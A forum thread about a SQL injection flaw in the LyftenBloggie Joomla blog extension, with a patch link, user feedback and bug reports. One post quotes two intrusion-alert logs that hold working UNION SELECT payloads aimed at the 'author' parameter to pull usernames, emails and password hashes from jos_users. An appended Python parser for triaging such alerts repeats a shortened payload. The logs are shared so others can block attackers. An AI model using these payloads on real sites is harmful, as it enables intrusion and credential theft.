Lyften Bloggie - Remote SQL injection Patch! - Forums


Announcement: Verbal Update

I'm so sorry everyone, I have been super busy. I'll have a new version of my site and LyftenBloggie out soon. I have a lot of emails and forum comments to go through right now.

As for the LyftenBloggie Remote SQL injection vulnerability problem, here is a patch:

http://www.lyften.com/products/lyftenbloggie/extensions/download/id-20.html

Hope everyone is having a great holiday!

 -Daniel

Cool, this is an EXCELLENT extension!

Please look, it now contains a French translation:

http://www.joomlafrance.org/telecharger/fileinfo/Lyften_Bloggie.html

Can you add the translation file?

 Thanks!

Welcome back!!!

Regarding the new version, will the commenting system be improved? That was the only thing that stopped me using it for a client site when I tried it before. My memory is a bit faded now but I remember having to click add comment then had to click add comment again (I think the 2nd add comment link was on the right of the screen).

UPDATE: Weird...I've just installed the blog again and the comments seem to be working and look different (better) than the last time I tried it. So please ignore my stupid question about comments ;)

And I'm not chasing or anything but do you think the new version will be out by the end of Jan? (I have a couple of sites which I'd love to use this blog on but I have a deadline of end of Jan). Not a big deal :)

Thanks again for continuing to work on this great extension.

 

Cheers,

Bob.

Great, hope you fix all the problems people have with getting all the modules to work. The only one I can get to work is the category module.

 

I also have a problem because users can't delete their blogs in the front end... that must be a bug?

 

rgds

I'm really sad that I read this post too late; my entire site was exploited due to this vulnerability. I think that this is a great addition to any Joomla site, but it lacks support.

But on the other hand, I think people will be more motivated to donate and support this project if they see more updates coming and good support.

Don't get me wrong, I'm just expressing how I feel.

This is how it looks. So now you can blacklist Turkish IP no. 94.120.216.37.

There was attack of typeSQL injection discovered on your site.

Additional Information:
---------------------------------------------
TYPE: SQL injection
IP: 94.120.216.37
USER: [0]
REFERER:
GET: Array
(
[option] => com_lyftenbloggie
[author] => <b>62 union select 1,concat_ws(0x3a,username,0x3a,email,0x3a,activation),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from jos_users--</b>
)

POST: Array
(
[author] => <b>62 union select 1,concat_ws(0x3a,username,0x3a,email,0x3a,activation),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from jos_users--</b>
)

COOCKIE: Array
(
[7f6d0e09275fb84130aae261eba5cc6f] => c7f8ba95d2229a3a649ac118f08ebc5e
[author] => <b>62 union select 1,concat_ws(0x3a,username,0x3a,email,0x3a,activation),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from jos_users--</b>
)

 

This is another..

 

Additional Information:
---------------------------------------------
TYPE: SQL injection
IP: 109.72.61.219
USER: [0]
REFERER:
GET: Array
(
[option] => com_lyftenbloggie
[author] => <b>62 union select 1,concat_ws(0x3a,username,password),1,1,@@version,666,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from jos_users--</b>
)

POST: Array
(
[author] => <b>62 union select 1,concat_ws(0x3a,username,password),1,1,@@version,666,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from jos_users--</b>
)

COOCKIE: Array
(
[7f6d0e09275fb84130aae261eba5cc6f] => f705c8fff6db011ed1f3e1dd18d227a7
[author] => <b>62 union select 1,concat_ws(0x3a,username,password),1,1,@@version,666,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from jos_users--</b>
)

 

Last Edited On: 15 Apr 2010 23:50:05 By JoeBest for the Reason I was wrong
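An added example, not part of any post in this thread and not LyftenBloggie code: a small triage parser for alert reports in the layout quoted above, which pulls out the source IP, the flagged request parameters, and the table and columns the UNION SELECT was aimed at. The sample alert, the documentation IP and the function name `triage` are constructed for illustration.

```python
import re

# Constructed sample in the alert layout quoted in the thread (documentation IP,
# shortened payload); it is not one of the reports posted above.
SAMPLE_ALERT = """\
TYPE: SQL injection
IP: 203.0.113.7
USER: [0]
REFERER:
GET: Array
(
[option] => com_lyftenbloggie
[author] => <b>62 union select 1,concat_ws(0x3a,username,password),3 from jos_users--</b>
)

COOCKIE: Array
(
[author] => <b>62 union select 1,concat_ws(0x3a,username,password),3 from jos_users--</b>
)
"""

SECTION = re.compile(r"^(GET|POST|COOCKIE|COOKIE): Array$")  # report spells it COOCKIE
FLAGGED = re.compile(r"^\[(?P<name>[^\]]+)\] => <b>(?P<value>.*)</b>$")
UNION = re.compile(r"\bunion\s+select\b(?P<cols>.*?)\bfrom\s+(?P<table>\w+)", re.I | re.S)
IDENT = re.compile(r"(?<![\w@])[A-Za-z_]\w*")  # skips 0x3a, numbers and @@variables
SQL_FUNCS = {"concat", "concat_ws"}            # function names, not columns


def triage(alert: str) -> dict:
    """Summarise one alert: source IP, flagged parameters, targeted table and columns."""
    out = {"ip": None, "params": set(), "tables": set(), "columns": set()}
    section = None
    for line in alert.splitlines():
        line = line.strip()
        if line.startswith("IP:"):
            out["ip"] = line[3:].strip()
        elif m := SECTION.match(line):
            section = m.group(1)
        elif (m := FLAGGED.match(line)) and section:
            out["params"].add((section, m.group("name")))
            if u := UNION.search(m.group("value")):
                out["tables"].add(u.group("table"))
                cols = {c.lower() for c in IDENT.findall(u.group("cols"))}
                out["columns"] |= cols - SQL_FUNCS
    return out
```

The `columns` set is what to treat as exposed when scoping the response: a `password` entry there means the stored hashes in that table should be considered read.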
This is already in 1.0.4, right?

Tnx
